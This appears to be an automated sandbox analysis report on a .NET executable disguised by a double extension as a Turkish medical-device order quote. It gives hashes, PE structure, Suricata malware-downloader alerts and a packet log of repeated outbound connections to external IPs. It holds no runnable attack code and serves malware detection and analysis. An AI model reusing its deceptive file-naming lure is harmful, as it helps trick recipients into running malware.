                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_httvbjpu.gxp.ps1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5ovbtyj.b2d.ps1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Entropy (8bit):7.6134023745025186
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                        File name:fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        File size:865'792 bytes
                                                                                                                        MD5:a4ff2584dad5f40a71bdd4a108528492
                                                                                                                        SHA1:ad9413cebc5c0fc3ab344c00cb361fef9b0a0efe
                                                                                                                        SHA256:bcdee41502d32ac1f8b9ef98a25047a18550caf4947cb8111c2276cabb106149
                                                                                                                        SHA512:b195494368e80e4d12c9cafced3f13bff87a828ce45cf97e7dbb2bcbe72512d8bdef536947dc43bcc3a8050b71149c9daf7557126cb7e667fdc3c9240c02b4d1
                                                                                                                        SSDEEP:24576:0HMGoI+smdM8YM72MiEi7XKE9TnFwFOh:0MG1hMKHEibNnqO
                                                                                                                        TLSH:8205E054376ECB07C5384BF40A61E6B813796D9AF422D20B6ED97EEF7876B054B00683
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.................0..,..........ZJ... ...`....@.. ....................................@................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4d4a5a
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0xCD9CAC77 [Mon Apr 24 21:24:07 2079 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                        push ebx
                                                                                                                        add byte ptr [ecx+00h], bh
                                                                                                                        jnc 00007FD16918E532h
                                                                                                                        je 00007FD16918E532h
                                                                                                                        add byte ptr [ebp+00h], ch
                                                                                                                        add byte ptr [ecx+00h], al
                                                                                                                        arpl word ptr [eax], ax
                                                                                                                        je 00007FD16918E532h
                                                                                                                        imul eax, dword ptr [eax], 00610076h
                                                                                                                        je 00007FD16918E532h
                                                                                                                        outsd
                                                                                                                        add byte ptr [edx+00h], dh
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd4a060x4f.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000x5cc.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xd240c0x70.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x20000xd2a800xd2c00658a8092aaff1f1b5cbb5e48952dcb9aFalse0.8343237970788849data7.620022495811268IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0xd60000x5cc0x60019a03cb908a851873de7d0f2d95f20f2False0.42578125data4.114308857798215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0xd80000xc0x2001391a628ecdbc75f4fab0c830f838bacFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_VERSION0xd60900x33cdata0.428743961352657
                                                                                                                        RT_MANIFEST0xd63dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                        Network Behavior

                                                                                                                        Suricata IDS Alerts

                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-12-10T10:32:20.643001+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749704132.226.247.7380TCP
                                                                                                                        2024-12-10T10:32:24.846162+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749704132.226.247.7380TCP
                                                                                                                        2024-12-10T10:32:26.508181+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749729172.67.177.134443TCP
                                                                                                                        2024-12-10T10:32:29.783667+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749734132.226.247.7380TCP
                                                                                                                        2024-12-10T10:32:31.404226+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749743172.67.177.134443TCP
                                                                                                                        2024-12-10T10:32:33.877449+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749750132.226.247.7380TCP
                                                                                                                        2024-12-10T10:32:39.361877+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749764132.226.247.7380TCP
                                                                                                                        2024-12-10T10:32:45.131575+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749780172.67.177.134443TCP

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 10, 2024 10:32:15.533248901 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:15.652632952 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:15.652738094 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:15.653028965 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:15.772274017 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:18.659751892 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:18.663773060 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:18.783055067 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:20.588360071 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:20.643001080 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:20.906147957 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:20.906183004 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:20.906270027 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:21.301400900 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:21.301419020 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.522157907 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.522265911 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:22.526083946 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:22.526101112 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.526407003 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.580012083 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:22.627336025 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.963785887 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.963848114 CET44349717172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:22.963962078 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:22.969665051 CET49717443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:22.973265886 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:23.092678070 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:24.790920019 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:24.840722084 CET49729443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:24.840758085 CET44349729172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:24.840816021 CET49729443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:24.846162081 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:24.851260900 CET49729443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:24.851277113 CET44349729172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.063492060 CET44349729172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.066031933 CET49729443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:26.066067934 CET44349729172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.508203983 CET44349729172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.508261919 CET44349729172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.508383989 CET49729443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:26.508877039 CET49729443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:26.523191929 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:26.524426937 CET4973480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:26.643254042 CET8049704132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.643310070 CET4970480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:26.643821001 CET8049734132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:26.643939018 CET4973480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:26.644078016 CET4973480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:26.763437033 CET8049734132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:29.733500004 CET8049734132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:29.739737988 CET49743443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:29.739773989 CET44349743172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:29.739842892 CET49743443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:29.740195036 CET49743443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:29.740204096 CET44349743172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:29.783667088 CET4973480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:30.952526093 CET44349743172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:30.955118895 CET49743443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:30.955147982 CET44349743172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:31.404236078 CET44349743172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:31.404297113 CET44349743172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:31.404680014 CET49743443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:31.404865026 CET49743443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:31.409293890 CET4973480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:31.409295082 CET4975080192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:31.528749943 CET8049750132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:31.528902054 CET4975080192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:31.529026985 CET4975080192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:31.529165030 CET8049734132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:31.529414892 CET4973480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:31.648448944 CET8049750132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:33.833993912 CET8049750132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:33.854047060 CET4975880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:33.877449036 CET4975080192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:33.973522902 CET8049758132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:33.973603010 CET4975880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:33.973752022 CET4975880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:34.093005896 CET8049758132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:36.276942968 CET8049758132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:36.330972910 CET4975880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:36.333534002 CET4975880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:36.335208893 CET4976480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:36.453564882 CET8049758132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:36.453627110 CET4975880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:36.454888105 CET8049764132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:36.454956055 CET4976480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:36.469876051 CET4976480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:36.589318037 CET8049764132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:39.317708015 CET8049764132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:39.319123030 CET49770443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:39.319178104 CET44349770172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:39.319267035 CET49770443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:39.319493055 CET49770443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:39.319498062 CET44349770172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:39.361876965 CET4976480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:40.535419941 CET44349770172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:40.545448065 CET49770443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:40.545478106 CET44349770172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:40.983113050 CET44349770172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:40.983181000 CET44349770172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:40.983275890 CET49770443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:40.983871937 CET49770443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:40.987627029 CET4976480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:40.988223076 CET4977680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:41.107270002 CET8049764132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:41.107333899 CET4976480192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:41.107625961 CET8049776132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:41.107700109 CET4977680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:41.107857943 CET4977680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:41.227188110 CET8049776132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:43.454797983 CET8049776132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:43.463969946 CET49780443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:43.464025974 CET44349780172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:43.464106083 CET49780443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:43.464371920 CET49780443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:43.464390039 CET44349780172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:43.502526999 CET4977680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:44.674731970 CET44349780172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:44.676451921 CET49780443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:44.676491022 CET44349780172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:45.131584883 CET44349780172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:45.131652117 CET44349780172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:45.131704092 CET49780443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:45.132205963 CET49780443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:45.139899015 CET4977680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:45.140773058 CET4978680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:45.259809017 CET8049776132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:45.259896040 CET4977680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:45.260128021 CET8049786132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:45.260210037 CET4978680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:45.260377884 CET4978680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:45.379690886 CET8049786132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:47.806457043 CET8049786132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:47.807715893 CET49792443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:47.807759047 CET44349792172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:47.807852983 CET49792443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:47.808125019 CET49792443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:47.808140993 CET44349792172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:47.846257925 CET4978680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:49.018384933 CET44349792172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:49.019937992 CET49792443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:49.019977093 CET44349792172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:49.475562096 CET44349792172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:49.475634098 CET44349792172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:49.475693941 CET49792443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:49.476285934 CET49792443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:49.479259968 CET4978680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:49.480468035 CET4979880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:49.600351095 CET8049786132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:49.600434065 CET4978680192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:49.600689888 CET8049798132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:49.600789070 CET4979880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:49.600965977 CET4979880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:49.720307112 CET8049798132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:51.522171021 CET8049798132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:51.523638964 CET49804443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:51.523685932 CET44349804172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:51.523799896 CET49804443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:51.524127960 CET49804443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:51.524139881 CET44349804172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:51.570610046 CET4979880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:52.735402107 CET44349804172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:52.737211943 CET49804443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:52.737248898 CET44349804172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:53.181276083 CET44349804172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:53.181341887 CET44349804172.67.177.134192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:53.181397915 CET49804443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:53.181883097 CET49804443192.168.2.7172.67.177.134
                                                                                                                        Dec 10, 2024 10:32:53.194901943 CET4979880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:53.314604044 CET8049798132.226.247.73192.168.2.7
                                                                                                                        Dec 10, 2024 10:32:53.314675093 CET4979880192.168.2.7132.226.247.73
                                                                                                                        Dec 10, 2024 10:32:53.333470106 CET49809443192.168.2.7149.154.167.220
                                                                                                                        Dec 10, 2024 10:32:53.333503008 CET44349809149.154.167.220192.168.2.7
